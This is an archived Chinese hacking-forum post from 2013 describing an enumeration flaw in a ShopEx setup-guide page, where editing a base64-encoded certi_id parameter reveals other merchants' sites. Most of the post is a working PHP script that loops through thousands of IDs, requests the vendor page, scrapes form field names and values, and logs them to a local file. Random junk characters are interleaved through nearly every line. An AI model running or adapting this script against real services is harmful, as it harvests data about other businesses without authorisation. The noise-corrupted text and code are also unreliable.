中国网络渗透测试联盟

标题: ShopEx某接口缺陷可遍历所有用户网站 [打印本页]
作者: admin    时间: 2013-9-21 15:59
标题: ShopEx某接口缺陷可遍历所有用户网站
简要描述:+ H( z* v6 h: p! Z6 a: o
ShopEx某接口缺陷,可遍历所有网站! K( a: \* H2 ]  t
详细说明:
. l, L0 R" g$ n0 T8 l; Z1 ^问题出现在shopex 网店使用向导页面
6 u+ G/ B+ E/ c! ^% y9 @: s% J7 a2 h/ k) D% N, _, `2 S$ N# ?0 G
$ d0 z; H6 A7 S4 J1 e. n3 b3 B
5 X6 Z+ a; b- E( S/ F
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=1 f4 d5 [5 x- K% p5 m/ N

- o& C, m2 {/ U3 p7 y& m4 z, Y
9 j: n  Y" e1 Q% y" D+ q4 J4 v# P- e
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
% ]$ x3 T$ L/ H0 b: L; a. |; z) h* k5 t* N. L5 k7 Y2 d
) K) m4 @: _5 @) ?8 r+ r

! Z2 t) |' l8 d. ?我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 9 e9 L; @- I/ O' j* S( J" I

! K9 {2 H8 Q4 ?$ Q1 N6 H
. A* J! m! n+ C2 I6 |) D: M" [$ ~0 L2 A5 O( R+ a& C; G, _0 ~) J
<?php1 i: p* L! P6 A! @( _
! Y* j) p5 b; m) Y4 G
                for ($i=1; $i < 10000; $i++) { //遍历
- G) [2 Z% m1 R; m
/ O. W* Z5 }6 O8 i. i                        ShowshopExD($i);
: b) n8 L1 r2 s1 E9 e" S( A; K, v8 i: t
                }
1 H! {, l- Z/ k! W* b4 w1 _3 i2 [- u& h. E+ D) i) f' F& @2 i( W
                function ShowshopExD($cid) {- b4 ^- \; y! `* K% l
3 w; e' r: K5 t7 P/ h. h( e2 [9 L, Y
                $url='http://guide.ecos.shopex.cn/step2.php';5 u7 v: \$ v0 S

" h1 r! i  z, L/ ^) ~2 }                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
- u) V) `+ }& Q& m+ K" \
" [$ ?" d/ f. ~3 |$ _2 e+ _        $url = $url.'?refer='.$refer;
* s. j4 @6 A2 @8 C$ J; X' c
/ D7 L) L& u- f        $ch = curl_init($url);' w# a; V4 S: a3 M! n7 ]

: J& Y/ i1 B/ e. O& X0 n' F4 e        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;8 @1 G) [. v/ i# _; R; X7 s2 w

9 e) n. ]& }6 F- w; t7 h. q        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
- f8 C. b. D" f0 j5 S* g. ^* D4 K
        $result = curl_exec($ch);
* |" d# K7 z& ^; N  W' u( F5 T4 v$ t% X3 I1 l
        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
! V8 M. f- y9 j4 N: ~6 k
* i3 z1 A( U, H$ m" H        if(strpos($result,$refer))
4 D$ m( l5 O9 f" j" g. m* s2 A7 }6 u. ~: b
        {. X' m8 j: I2 m
1 E/ i' d+ n* {& m0 Z4 L+ C; _
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
1 A/ g0 x4 t4 o( @$ d+ r1 m
. U+ H: M) T+ h/ U1 E- ^- ]                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
4 z. x; y! r7 D: I  M7 @* x- m) T6 X2 c
$ T# G3 K+ `+ z* m5 B7 D' _                foreach ($value[1] as $key) {
* S- }. `3 q; y1 Z% K$ T# \5 _8 i& d! d9 ~' z3 n( K
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
; `6 j. d. s3 G$ @  \& u  J1 j8 ^
9 z  [, f4 B9 S  R: {6 Y. h3 g2 r                        echo $res[1][0].':'.$res[3][0]."\r\n";
9 k( _6 x* x  A7 W3 M4 |' N* c# V6 ?' s+ c( a+ u" B. [: L
                        $col =$res[1][0].':'.$res[3][0]."\r\n"; : D9 V) O$ G( p  s
- C( X, @1 F9 A( Z
                        fwrite($fp, $col, strlen($col)); ; \, B* ?- c: r6 L$ q' D( V

" N! F" e# v0 O. ^2 N                }
! j! f# I  s2 u4 L4 m  U( X5 F9 H" N; m% R$ O6 E. N
                echo '--------------------------------'."\r\n";
* a1 {! i  [  D6 P4 V9 H! g9 Z, R  e) e6 i
                fclose($fp);
$ k' `  F  G; P2 I8 V1 d! u
4 q2 \3 w4 J4 P: H# b! K$ ^        }9 M5 p' Q2 e; ?) W9 K
+ X  H3 H! i8 U& Q
        flush();
; Q+ P- I7 W/ x  f* K' W
5 `6 v7 r1 s- A; R8 @8 m        curl_close($ch);
4 N' G; C: L  d& M; X9 N# u
, P! x' ]7 N/ D3 B7 \0 r                }5 M! y2 {0 |; y) M+ v

  O" `0 O/ b- w$ N?>
0 E% q. U# ^7 ]1 b; R漏洞证明:5 v& g7 D! A- G) @& P
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg6 O% i0 f" h5 _+ K- u
refer换成其他加密方式1 x3 }2 _4 z! {' N+ c




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2